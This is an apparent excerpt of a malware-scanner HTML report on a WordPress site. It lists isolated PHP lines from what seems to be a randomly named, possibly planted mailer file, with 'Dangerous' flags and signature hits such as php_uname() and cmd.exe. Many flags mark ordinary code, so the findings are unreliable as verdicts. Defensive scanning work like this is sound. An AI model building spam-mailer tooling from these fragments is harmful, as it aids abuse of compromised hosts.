</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_191").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/5aYbd8mH9LE.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_192" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
